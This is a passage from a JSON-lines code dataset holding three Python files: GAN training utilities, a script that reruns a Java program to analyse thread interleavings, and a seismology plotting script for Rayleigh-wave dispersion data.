\")\n write_one_row_html(html_file, iterations, '%s/gen_a2b_train_current.jpg' % (image_directory), all_size)\n write_one_row_html(html_file, iterations, '%s/gen_b2a_train_current.jpg' % (image_directory), all_size)\n for j in range(iterations, image_save_iterations-1, -1):\n if j % image_save_iterations == 0:\n write_one_row_html(html_file, j, '%s/gen_a2b_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_a2b_train_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_train_%08d.jpg' % (image_directory, j), all_size)\n html_file.write(\"\")\n html_file.close()\n\n\ndef write_loss(iterations, trainer, train_writer):\n members = [attr for attr in dir(trainer) \\\n if not callable(getattr(trainer, attr)) and not attr.startswith(\"__\") and ('loss' in attr or 'grad' in attr or 'nwd' in attr)]\n for m in members:\n train_writer.add_scalar(m, getattr(trainer, m), iterations + 1)\n\n\ndef slerp(val, low, high):\n \"\"\"\n original: Animating Rotation with Quaternion Curves, Ken Shoemake\n https://arxiv.org/abs/1609.04468\n Code: https://github.com/soumith/dcgan.torch/issues/14, Tom White\n \"\"\"\n omega = np.arccos(np.dot(low / np.linalg.norm(low), high / np.linalg.norm(high)))\n so = np.sin(omega)\n return np.sin((1.0 - val) * omega) / so * low + np.sin(val * omega) / so * high\n\n\ndef get_slerp_interp(nb_latents, nb_interp, z_dim):\n \"\"\"\n modified from: PyTorch inference for \"Progressive Growing of GANs\" with CelebA snapshot\n https://github.com/ptrblck/prog_gans_pytorch_inference\n \"\"\"\n\n latent_interps = np.empty(shape=(0, z_dim), dtype=np.float32)\n for _ in range(nb_latents):\n low = np.random.randn(z_dim)\n high = np.random.randn(z_dim) # low + np.random.randn(512) * 0.7\n interp_vals = np.linspace(0, 1, num=nb_interp)\n latent_interp = np.array([slerp(v, low, high) for v in interp_vals],\n dtype=np.float32)\n latent_interps = np.vstack((latent_interps, latent_interp))\n\n return latent_interps[:, :, np.newaxis, np.newaxis]\n\n\n# Get model list for resume\ndef get_model_list(dirname, key):\n if os.path.exists(dirname) is False:\n return None\n gen_models = [os.path.join(dirname, f) for f in os.listdir(dirname) if\n os.path.isfile(os.path.join(dirname, f)) and key in f and \".pt\" in f]\n if gen_models is None:\n return None\n gen_models.sort()\n last_model_name = gen_models[-1]\n return last_model_name\n\n\ndef load_resnet50(model_dir):\n model = resnet.resnet50()\n load_state_dict(model, model_dir)\n return model\n\ndef load_inception(model_path):\n state_dict = torch.load(model_path)\n model = inception_v3(pretrained=False, transform_input=True)\n model.aux_logits = False\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, state_dict['fc.weight'].size(0))\n model.load_state_dict(state_dict)\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef vgg_preprocess(batch):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim = 1)\n batch = torch.cat((b, g, r), dim = 1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n mean = tensortype(batch.data.size()).cuda()\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return batch\n\n\ndef get_scheduler(optimizer, hyperparameters, iterations=-1):\n if 'lr_policy' not in hyperparameters or hyperparameters['lr_policy'] == 'constant':\n scheduler = None # constant scheduler\n elif hyperparameters['lr_policy'] == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=hyperparameters['step_size'],\n gamma=hyperparameters['gamma'], last_epoch=iterations)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', hyperparameters['lr_policy'])\n return scheduler\n\n\ndef weights_init(init_type='gaussian'):\n def init_fun(m):\n classname = m.__class__.__name__\n if (classname.find('Conv') == 0 or classname.find('Linear') == 0) and hasattr(m, 'weight'):\n # print m.__class__.__name__\n if init_type == 'gaussian':\n init.normal_(m.weight.data, 0.0, 0.02)\n elif init_type == 'xavier':\n init.xavier_normal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'kaiming':\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\n elif init_type == 'orthogonal':\n init.orthogonal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'default':\n pass\n else:\n assert 0, \"Unsupported initialization: {}\".format(init_type)\n if hasattr(m, 'bias') and m.bias is not None:\n init.constant_(m.bias.data, 0.0)\n\n return init_fun\n\n\nclass Timer:\n def __init__(self, msg):\n self.msg = msg\n self.start_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n print(self.msg % (time.time() - self.start_time))\n\n\ndef pytorch03_to_pytorch04(state_dict_base, trainer_name):\n def __conversion_core(state_dict_base, trainer_name):\n state_dict = state_dict_base.copy()\n if trainer_name == 'IPMNet':\n for key, value in state_dict_base.items():\n if key.endswith(('enc_content.model.0.norm.running_mean',\n 'enc_content.model.0.norm.running_var',\n 'enc_content.model.1.norm.running_mean',\n 'enc_content.model.1.norm.running_var',\n 'enc_content.model.2.norm.running_mean',\n 'enc_content.model.2.norm.running_var',\n 'enc_content.model.3.model.0.model.1.norm.running_mean',\n 'enc_content.model.3.model.0.model.1.norm.running_var',\n 'enc_content.model.3.model.0.model.0.norm.running_mean',\n 'enc_content.model.3.model.0.model.0.norm.running_var',\n 'enc_content.model.3.model.1.model.1.norm.running_mean',\n 'enc_content.model.3.model.1.model.1.norm.running_var',\n 'enc_content.model.3.model.1.model.0.norm.running_mean',\n 'enc_content.model.3.model.1.model.0.norm.running_var',\n 'enc_content.model.3.model.2.model.1.norm.running_mean',\n 'enc_content.model.3.model.2.model.1.norm.running_var',\n 'enc_content.model.3.model.2.model.0.norm.running_mean',\n 'enc_content.model.3.model.2.model.0.norm.running_var',\n 'enc_content.model.3.model.3.model.1.norm.running_mean',\n 'enc_content.model.3.model.3.model.1.norm.running_var',\n 'enc_content.model.3.model.3.model.0.norm.running_mean',\n 'enc_content.model.3.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n else:\n def __conversion_core(state_dict_base):\n state_dict = state_dict_base.copy()\n for key, value in state_dict_base.items():\n if key.endswith(('enc.model.0.norm.running_mean',\n 'enc.model.0.norm.running_var',\n 'enc.model.1.norm.running_mean',\n 'enc.model.1.norm.running_var',\n 'enc.model.2.norm.running_mean',\n 'enc.model.2.norm.running_var',\n 'enc.model.3.model.0.model.1.norm.running_mean',\n 'enc.model.3.model.0.model.1.norm.running_var',\n 'enc.model.3.model.0.model.0.norm.running_mean',\n 'enc.model.3.model.0.model.0.norm.running_var',\n 'enc.model.3.model.1.model.1.norm.running_mean',\n 'enc.model.3.model.1.model.1.norm.running_var',\n 'enc.model.3.model.1.model.0.norm.running_mean',\n 'enc.model.3.model.1.model.0.norm.running_var',\n 'enc.model.3.model.2.model.1.norm.running_mean',\n 'enc.model.3.model.2.model.1.norm.running_var',\n 'enc.model.3.model.2.model.0.norm.running_mean',\n 'enc.model.3.model.2.model.0.norm.running_var',\n 'enc.model.3.model.3.model.1.norm.running_mean',\n 'enc.model.3.model.3.model.1.norm.running_var',\n 'enc.model.3.model.3.model.0.norm.running_mean',\n 'enc.model.3.model.3.model.0.norm.running_var',\n\n 'dec.model.0.model.0.model.1.norm.running_mean',\n 'dec.model.0.model.0.model.1.norm.running_var',\n 'dec.model.0.model.0.model.0.norm.running_mean',\n 'dec.model.0.model.0.model.0.norm.running_var',\n 'dec.model.0.model.1.model.1.norm.running_mean',\n 'dec.model.0.model.1.model.1.norm.running_var',\n 'dec.model.0.model.1.model.0.norm.running_mean',\n 'dec.model.0.model.1.model.0.norm.running_var',\n 'dec.model.0.model.2.model.1.norm.running_mean',\n 'dec.model.0.model.2.model.1.norm.running_var',\n 'dec.model.0.model.2.model.0.norm.running_mean',\n 'dec.model.0.model.2.model.0.norm.running_var',\n 'dec.model.0.model.3.model.1.norm.running_mean',\n 'dec.model.0.model.3.model.1.norm.running_var',\n 'dec.model.0.model.3.model.0.norm.running_mean',\n 'dec.model.0.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n return state_dict\n\n state_dict = dict()\n state_dict['a'] = __conversion_core(state_dict_base['a'], trainer_name)\n state_dict['b'] = __conversion_core(state_dict_base['b'], trainer_name)\n return state_dict\n\ndef randomflip(image, mask, texture):\n randnum = random.random()\n if randnum > 0.5:\n image = image.flip(3)\n mask, texture = mask.flip(3), texture.flip(3)\n return image, mask, texture\n\ndef randomcrop(image, mask, texture, height, width):\n random_h = random.randint(0, image.size()[2] - height)\n random_w = random.randint(0, image.size()[3] - width)\n image = image[:, :,random_h: random_h + height, random_w : random_w + width]\n mask = mask[:, :,random_h: random_h + height, random_w : random_w + width]\n texture = texture[:, :,random_h: random_h + height, random_w : random_w + width]\n return image, mask, texture\n\ndef load_state_dict(model, fname):\n \"\"\"\n Set parameters converted from Caffe models authors of VGGFace2 provide.\n See https://www.robots.ox.ac.uk/~vgg/data/vgg_face2/.\n Arguments:\n model: model\n fname: file name of parameters converted from a Caffe model, assuming the file format is Pickle.\n \"\"\"\n with open(fname, 'rb') as f:\n weights = pickle.load(f, encoding='latin1')\n\n own_state = model.state_dict()\n for name, param in weights.items():\n if name in own_state:\n try:\n own_state[name] = torch.from_numpy(param)\n # own_state[name].copy_(torch.from_numpy(param))\n except Exception:\n raise RuntimeError('While copying the parameter named {}, whose dimensions in the model are {} and whose '\\\n 'dimensions in the checkpoint are {}.'.format(name, own_state[name].size(), param.size()))\n else:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n\n", "repo_name": "huangzhikun1995/IPM-Net", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 20670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 83, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 87, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 87, "usage_type": "name"}, {"api_name": "data.ImageFolder", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 89, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 108, "usage_type": "name"}, {"api_name": "torchvision.utils.save_image", "line_number": 109, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "resnet.resnet50", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 262, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 264, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 266, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 272, "usage_type": "name"}, {"api_name": "time.time", "line_number": 283, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "random.random", "line_number": 371, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 378, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 379, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 400, "usage_type": "call"}]} +{"seq_id": "74971681767", "text": "import argparse\n\n# Create parser for reading program arguments\nimport os\nimport shutil\nimport subprocess\nimport jellyfish as jf\nimport numpy\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\n\n# Convert a string to unicode\ndef to_unicode(code: int):\n return chr(int(str(code).zfill(8), 16))\n\n\ndef flatten_results_map(results_map):\n total = \"\"\n for key in results_map.keys():\n total += f\"({key},{round(results_map[key], 4)})\"\n return total\n\n\nargparser = argparse.ArgumentParser(\n prog='testscript',\n description='Automate OSCAR\\'s noise injection routine.',\n epilog='Run with argument -h for help.'\n)\n\nDISTANCE_ALGS = {\n 0: \"Levenshtein\",\n 1: \"Damerau-Levenshtein\",\n 2: \"Jaro\",\n 3: \"Jaro-Wrinkler\",\n 4: \"Hamming\",\n}\n\nargparser.add_argument('program_dir', help='location of program to run.')\nargparser.add_argument('executable', help='Name of program\\'s main class to run or jar file name.')\nargparser.add_argument('program_args', type=str, help='Arguments to be passed to program.')\n\nargparser.add_argument('-c', '--count', default=\"30\", type=str,\n help='Number of times to run program (comma separated).')\nargparser.add_argument('-da', '--distance_algorithm', default=\"0\", type=int,\n help=f'Distance algorithm: {DISTANCE_ALGS}.')\nargparser.add_argument('-j', '--jar', action='store_true', help='Run program as a jar.')\nargparser.add_argument('-dt', '--disable_thread_ids', action='store_true', help='Disable thread ID parsing.')\nargparser.add_argument('-utl', '--unique_trace_locations', action='store_true',\n help='Enable unique ids for repeated trace locations.')\nargparser.add_argument('-uti', '--unordered_thread_ids', action='store_true', help='Maintain original thread ID order.')\nargparser.add_argument('-dc', '--disable_coverage', action='store_true', help='Disable coverage analysis.')\nargparser.add_argument('-di', '--disable_interleaving', action='store_true', help='Disable interleaving analysis.')\nargparser.add_argument('-of', '--output_flags', type=str, help='Flags which will be checked in program output.')\n\nargv = argparser.parse_args()\n\n# Check distance alg valid\nif argv.distance_algorithm < 0 or argv.distance_algorithm > len(DISTANCE_ALGS) - 1:\n print(f'Invalid distance algorithm.')\n exit(1)\n\n# Check if file exists\nif not os.path.isdir(argv.program_dir):\n print(f'Folder {argv.program_dir} not found')\n exit(1)\n\nos.chdir(argv.program_dir)\n\n# Remove old generated files\nif os.path.isdir('oscar_output'):\n shutil.rmtree('oscar_output')\n\n###############################################################################################################\n\n# Save runtimes\nruntimes = []\n\nrun_counts = []\nfor rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\nruns = run_counts[len(run_counts) - 1]\n\nprint(f'Running program {argv.count} times')\n\nFLAGS = str(argv.output_flags).split(\",\")\nflags_detected = {}\n\n# Run program x times\nfor i in tqdm(range(0, runs), desc=\"Variable Args\"):\n start_time = time.time_ns() / 1_000_000\n\n if not argv.jar:\n result = subprocess.run(\n f'java {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n else:\n result = subprocess.run(\n f'java -jar {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n if result.returncode != 0:\n print(result.stderr.decode('utf-8'))\n print(result.stdout.decode('utf-8'))\n\n # Check the output for flags\n output = result.stdout.decode('utf-8')\n\n # Parse line by line to check for flags\n for line in output.split(\"\\n\"):\n for flag in FLAGS:\n if flag in line:\n if line in flags_detected:\n flags_detected[line] = flags_detected[line] + 1\n else:\n flags_detected[line] = 1\n break\n\n for rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\n runtimes.append(time.time_ns() / 1_000_000 - start_time)\n\nprint(f'Finished running. Analyzing files.')\n\n###############################################################################################################\n\n\n###############################################################################################################\n\nprint()\nprint(\"Results:\")\nprint(f'\\tAverage runtime (ms): {round(np.average(runtimes), 0)}')\n\nfor flag in flags_detected:\n print(f'\\tDetected flag_-_-{flag}-_-_{flags_detected[flag]}')\n\nif not argv.disable_coverage:\n # Try to analyze created files\n os.chdir('oscar_output')\n files = os.listdir('.')\n\n location_ids = {}\n interleavings = []\n trace_pairs = {}\n\n for file in files:\n content = open(file, 'r') # .read()\n thread_ids = []\n trace_pairs_count = {}\n\n interleaving = ''\n\n # Get all thread ids for ordering\n for line in content:\n thread_id = int(line.split(' ')[0].strip())\n if thread_id not in thread_ids:\n thread_ids.append(thread_id)\n\n # Check if thread ids should maintain order when mapped\n if argv.unordered_thread_ids:\n thread_ids = numpy.sort(thread_ids)\n\n # Map thread ids\n mapped_thread_ids = {}\n for i in range(0, len(thread_ids)):\n mapped_thread_ids[thread_ids[i]] = to_unicode(i)\n\n # Parse normally\n content = open(file, 'r')\n\n for line in content:\n thread_id = mapped_thread_ids[int(line.split(' ')[0].strip())]\n\n # Make the interleaving id value start from 0\n location_id = line.split(' ')[1].strip()\n if location_id not in location_ids:\n location_ids[location_id] = to_unicode(len(location_ids) + len(thread_ids))\n location_id = location_ids[location_id]\n\n # Append content with or without thread id\n trace_pair = location_id\n if not argv.disable_thread_ids:\n trace_pair = f'{thread_id}{trace_pair}'\n\n # Check if this interleaving pair is duplicate and needs new assigned id\n if argv.unique_trace_locations:\n if trace_pair not in trace_pairs_count:\n trace_pairs_count[trace_pair] = 0\n trace_pairs_count[trace_pair] += 1\n\n trace_pair = f'{trace_pairs_count[trace_pair]}_{trace_pair}'\n\n # Transform interleaving pair representation in single mapped unicode\n if trace_pair not in trace_pairs:\n trace_pairs[trace_pair] = to_unicode(len(trace_pairs))\n\n interleaving += trace_pairs[trace_pair]\n\n interleavings.append(interleaving)\n\n # Parse interleavings\n avg_dist_runs = {}\n std_dev_runs = {}\n uniq_interleavings_runs = {}\n avg_cluster_size = {}\n\n for rc in run_counts:\n interleavings_split = interleavings[0:rc]\n uniq_interleavings_runs[rc] = len(set(interleavings_split))\n\n clusters = {}\n # Calculate avg cluster size\n for interleaving in interleavings_split:\n if interleaving not in clusters:\n clusters[interleaving] = 1\n else:\n clusters[interleaving] += 1\n\n avg_cluster_size[rc] = np.average(list(clusters.values()))\n\n # For regular pairs\n interleaving_dists = []\n interleaving_dist = 0\n\n # Calculate average ratio\n if not argv.disable_coverage:\n for x in range(0, len(interleavings_split) - 1):\n for y in range(x + 1, len(interleavings_split)):\n ix = interleavings_split[x]\n iy = interleavings_split[y]\n\n # Levenshtein\n if argv.distance_algorithm == 0:\n interleaving_dist = jf.levenshtein_distance(ix, iy)\n\n # Damerau-Levenshtein\n if argv.distance_algorithm == 1:\n interleaving_dist = jf.damerau_levenshtein_distance(ix, iy)\n\n # Jaro\n if argv.distance_algorithm == 2:\n interleaving_dist = jf.jaro_similarity(ix, iy)\n\n # Jaro-Wrinkler\n if argv.distance_algorithm == 3:\n interleaving_dist = jf.jaro_winkler_similarity(ix, iy)\n\n # Hamming\n if argv.distance_algorithm == 4:\n interleaving_dist = jf.hamming_distance(ix, iy)\n\n interleaving_dists.append(interleaving_dist)\n else:\n interleaving_dists.append(1)\n\n avg_dist_runs[rc] = round(np.average(interleaving_dists), 4)\n std_dev_runs[rc] = round(float(np.std(interleaving_dists)), 4)\n\n distance_alg = DISTANCE_ALGS[argv.distance_algorithm]\n print(f'\\tUnique interleavings: {flatten_results_map(uniq_interleavings_runs)}')\n print(f'\\tAverage {distance_alg} distance: {flatten_results_map(avg_dist_runs)}')\n print(f'\\t{distance_alg} distance standard deviation: {flatten_results_map(std_dev_runs)}')\n print(f'\\tAverage Cluster Size: {flatten_results_map(avg_cluster_size)}')\n", "repo_name": "filipedeluna/oscar", "sub_path": "py_scripts/testscript/testscript.py", "file_name": "testscript.py", "file_ext": "py", "file_size_in_byte": 9280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time_ns", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 96, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 101, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.time_ns", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 137, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 224, "usage_type": "call"}, {"api_name": "jellyfish.levenshtein_distance", "line_number": 239, "usage_type": "call"}, {"api_name": "jellyfish.damerau_levenshtein_distance", "line_number": 243, "usage_type": "call"}, {"api_name": "jellyfish.jaro_similarity", "line_number": 247, "usage_type": "call"}, {"api_name": "jellyfish.jaro_winkler_similarity", "line_number": 251, "usage_type": "call"}, {"api_name": "jellyfish.hamming_distance", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 262, "usage_type": "call"}]} +{"seq_id": "28213444995", "text": "import os\nimport argparse\n\nimport numpy\nimport matplotlib.pyplot as P\n\nfrom scipy.special import jacobi\n\ndef loaddispersion(fname):\n\n f = open(fname, 'r')\n lines = f.readlines()\n\n slon, slat, dlon, dlat, distkm = map(float, lines[0].split())\n freq, count, acsn, csn, N = map(float, lines[1].split())\n\n f, r, i, ncfr, ncfi = zip(*map(lambda x: map(float, x.split()), lines[2:]))\n\n spec = numpy.array(r) + numpy.array(i)*1.0j\n ncf = numpy.array(ncfr) + numpy.array(ncfi)*1.0j\n return (slon, slat, dlon, dlat, distkm, int(count)), numpy.array(f), freq, acsn, csn, spec, ncf\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-f', '--fits', type = str, required = True, help = 'Fits base path')\n\n parser.add_argument('-d', '--data', type = str, default = '../example_data', help = 'Data base path')\n\n parser.add_argument('--width', type = float, default = 8.0, help = 'Figure width')\n parser.add_argument('--height', type = float, default = 3.0, help = 'Figure height')\n \n args = parser.parse_args()\n\n if os.access(os.path.join(args.fits, 'opt.pred'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred'))\n elif os.access(os.path.join(args.fits, 'opt.pred-rayleigh'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred-rayleigh'))\n else:\n raise Exception('No predictions file %s found' % os.path.join(args.fits, 'opt.pred'))\n\n stationpair = '_'.join(os.path.basename(args.fits.rstrip('/')).split('_')[1:3])\n\n rayleighdata = os.path.join(args.data, 'RayleighResponse/dispersion_%s.txt' % stationpair)\n\n (_, _, _, _, distkm, _), f, sample_rate, rayleigh_acsn, rayleigh_csn, rayleigh_spec, rayleigh_ncf = loaddispersion(rayleighdata)\n\n figB, bx = P.subplots()\n figB.set_size_inches((args.width, args.height))\n figB.set_tight_layout(True)\n\n #\n # Modulated Bessel is column 5, Raw Bessel is column 3, Envelope 4\n #\n colindex = 5\n #colindex = 3\n\n indices = numpy.where(rayleighpred[:,1] > 0.0)[0]\n\n bx.set_title('Rayleigh')\n bx.plot(rayleighpred[indices,0], rayleighpred[indices,colindex], 'r-', linewidth = 1, zorder = 100)\n bx.plot(f, numpy.real(rayleigh_ncf), linestyle = 'solid', color = 'grey', linewidth = 2, zorder = 50)\n\n bx.set_xlim(0, 0.4)\n\n bx.set_xlabel('Frequency (Hz)')\n\n P.show()\n", "repo_name": "rhyshawkins/AkiEstimate", "sub_path": "tutorial/scripts/plot_bessel_result_rayleigh.py", "file_name": "plot_bessel_result_rayleigh.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.access", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": 